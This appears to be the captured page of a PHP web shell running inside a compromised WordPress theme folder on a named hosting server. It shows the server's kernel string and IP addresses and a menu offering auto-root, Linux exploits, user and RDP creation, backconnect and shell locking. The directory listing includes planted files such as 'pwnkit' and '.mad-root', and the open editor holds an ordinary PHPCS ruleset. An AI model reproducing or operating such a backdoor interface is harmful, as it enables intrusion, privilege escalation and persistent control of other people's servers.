Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
alpha /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
country-flags
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
.eslintrc.js
132
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.prettierrc.js
246
B
-rw-r--r--
.stylelintrc.json
41
B
-rw-r--r--
404.php
1.54
KB
-rw-r--r--
LICENSE
17.62
KB
-rw-r--r--
README.md
4.39
KB
-rw-r--r--
archive.php
693
B
-rw-r--r--
block-editor-style.css
210.42
KB
-rw-r--r--
block-editor-style.css.map
12.98
KB
-rw-r--r--
comments.php
1.92
KB
-rw-r--r--
composer.json
1.28
KB
-rw-r--r--
composer.lock
41.29
KB
-rw-r--r--
editor-fonts.css
130.45
KB
-rw-r--r--
editor-fonts.css.map
918
B
-rw-r--r--
footer-splash.php
460
B
-rw-r--r--
footer.php
453
B
-rw-r--r--
functions.php
10.87
KB
-rw-r--r--
header-splash.php
1.64
KB
-rw-r--r--
header.php
2.81
KB
-rw-r--r--
home.php
1.83
KB
-rw-r--r--
index.php
1.24
KB
-rw-r--r--
package-lock.json
1.39
MB
-rw-r--r--
package.json
1.8
KB
-rw-r--r--
page.php
790
B
-rw-r--r--
phpcs.xml.dist
3.97
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
1.33
KB
-rw-r--r--
screenshot.png
29.5
KB
-rw-r--r--
search.php
1.06
KB
-rw-r--r--
sidebar.php
343
B
-rw-r--r--
single-product.php
492
B
-rw-r--r--
single.php
1017
B
-rw-r--r--
style-rtl.css
205.85
KB
-rw-r--r--
style.css
205.92
KB
-rw-r--r--
style.css.map
17.6
KB
-rw-r--r--
template-splash.php
636
B
-rw-r--r--
test.php
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpcs.xml.dist
<?xml version="1.0"?> <ruleset name="WordPress Theme Coding Standards"> <!-- See https://github.com/squizlabs/PHP_CodeSniffer/wiki/Annotated-ruleset.xml --> <!-- See https://github.com/WordPress/WordPress-Coding-Standards --> <!-- See https://github.com/WPTRT/WPThemeReview --> <!-- See https://github.com/PHPCompatibility/PHPCompatibilityWP --> <!-- Set a description for this ruleset. --> <description>A custom set of code standard rules to check for WordPress themes.</description> <!-- ############################################################################# COMMAND LINE ARGUMENTS https://github.com/squizlabs/PHP_CodeSniffer/wiki/Annotated-ruleset.xml ############################################################################# --> <!-- Pass some flags to PHPCS: p flag: Show progress of the run. s flag: Show sniff codes in all reports. --> <arg value="ps"/> <!-- Strip the filepaths down to the relevant bit. --> <arg name="basepath" value="./"/> <!-- Check up to 8 files simultaneously. --> <arg name="parallel" value="8"/> <!-- Check PHP files only. JavaScript and CSS files are checked separately using the @wordpress/scripts package. --> <arg name="extensions" value="php"/> <!-- Check all files in this directory and the directories below it. --> <file>.</file> <!-- Exclude patterns. --> <exclude-pattern>/vendor/*</exclude-pattern> <exclude-pattern>/node_modules/*</exclude-pattern> <!-- ############################################################################# USE THE WordPress AND THE Theme Review RULESET ############################################################################# --> <rule ref="WordPress"> <!-- This rule does not apply here since the Alpha prefix should be changed by the theme author. --> <exclude name="WordPress.NamingConventions.PrefixAllGlobals.ShortPrefixPassed"/> </rule> <!--<rule ref="WPThemeReview"/>--> <!-- ############################################################################# SNIFF SPECIFIC CONFIGURATION ############################################################################# --> <!-- Verify that the text_domain is set to the desired text-domain. Multiple valid text domains can be provided as a comma-delimited list. --> <rule ref="WordPress.WP.I18n"> <properties> <property name="text_domain" type="array" value="alpha"/> </properties> </rule> <!-- Allow for theme specific exceptions to the file name rules based on the theme hierarchy. --> <rule ref="WordPress.Files.FileName"> <properties> <property name="is_theme" value="true"/> </properties> </rule> <!-- Set the minimum supported WP version. This is used by several sniffs. The minimum version set here should be in line with the minimum WP version as set in the "Requires at least" tag in the readme.txt file. --> <config name="minimum_supported_wp_version" value="4.5"/> <rule ref="WordPress.Arrays.MultipleStatementAlignment"> <properties> <!-- No need to adjust alignment of large arrays when the item with the largest key is removed. --> <property name="exact" value="false"/> <!-- Don't align multi-line items if ALL items in the array are multi-line. --> <property name="alignMultilineItems" value="!=100"/> <!-- Array assignment operator should always be on the same line as the array key. --> <property name="ignoreNewlines" value="false"/> </properties> </rule> <!-- Verify that everything in the global namespace is prefixed with a theme specific prefix. Multiple valid prefixes can be provided as a comma-delimited list. --> <rule ref="WordPress.NamingConventions.PrefixAllGlobals"> <properties> <property name="prefixes" type="array" value="alpha" /> </properties> </rule> <!-- ############################################################################# USE THE PHPCompatibility RULESET ############################################################################# --> <config name="testVersion" value="5.6-"/> <!--<rule ref="PHPCompatibilityWP"/>--> </ruleset>
Close